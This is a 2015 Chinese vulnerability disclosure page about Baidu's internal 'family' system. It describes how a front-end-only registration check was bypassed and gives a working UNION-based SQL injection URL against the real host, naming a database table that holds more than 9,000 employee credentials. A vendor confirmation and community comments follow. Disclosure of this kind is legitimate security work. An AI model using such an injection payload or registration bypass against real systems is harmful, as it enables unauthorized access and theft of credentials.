漏洞概要
关注数(24)
关注此漏洞
漏洞标题:百度某内部系统存在逻辑漏洞及SQL注入(导致9000多员工账号密码泄露)
相关厂商:百度
提交时间:2015-05-19 13:31
修复时间:2015-07-05 16:10
公开时间:2015-07-05 16:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-21: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向核心白帽子及相关领域专家公开
2015-06-10: 细节向普通白帽子公开
2015-06-20: 细节向实习白帽子公开
2015-07-05: 细节向公众公开
简要描述:
杀器在手,天下我有!
详细说明:
http://weixin.family.baidu.com/index.php/site/login
这个是百度family,注册的时候限定只能百度邮箱,但是只是前端验证,可以绕过
绕过直接注册一个qq邮箱的账号
收到激活码。激活即可登陆成功,
登陆成功以后,找到一个注入:
漏洞证明:
注入,可以跑账号密码,仅测试少量数据。
密码
9000多用户啊
http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,%28SELECT%20count%28*%29%20FROM%20FOTSRbdBZydSEIvukDVz.user%29,4%20--%20;
修复方案:
版权声明:转载请注明来源 杀器王子@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2015-05-21 16:09
厂商回复:
感谢白帽子
最新状态:
暂无
漏洞评价:
评论
-
2015-05-19 13:33 |
sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)
-
2015-05-19 13:38 |
胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)
-
2015-05-19 13:39 |
爱上平顶山 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)
-
2015-05-19 13:46 |
小不点 ( 普通白帽子 | Rank:751 漏洞数:78 | 生命不息,刷洞不止.....)
-
2015-05-19 13:54 |
紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)
-
2015-05-19 14:09 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2015-05-19 14:11 |
浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)
-
2015-05-19 14:40 |
scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)
-
2015-05-19 15:07 |
’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)
-
2015-05-19 15:50 |
sql小神 ( 路人 | Rank:19 漏洞数:4 | 有些漏洞可以提,有些漏洞不可以提。)
@xsser 你要说撸管双雄是一个人,我还信,你说姐姐和王子是一个人不信啊,是一对吧,可能会信
-
2015-05-19 16:10 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2015-05-19 21:28 |
多情公子 ( 路人 | Rank:0 漏洞数:2 | google)
-
2015-07-05 17:29 |
0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)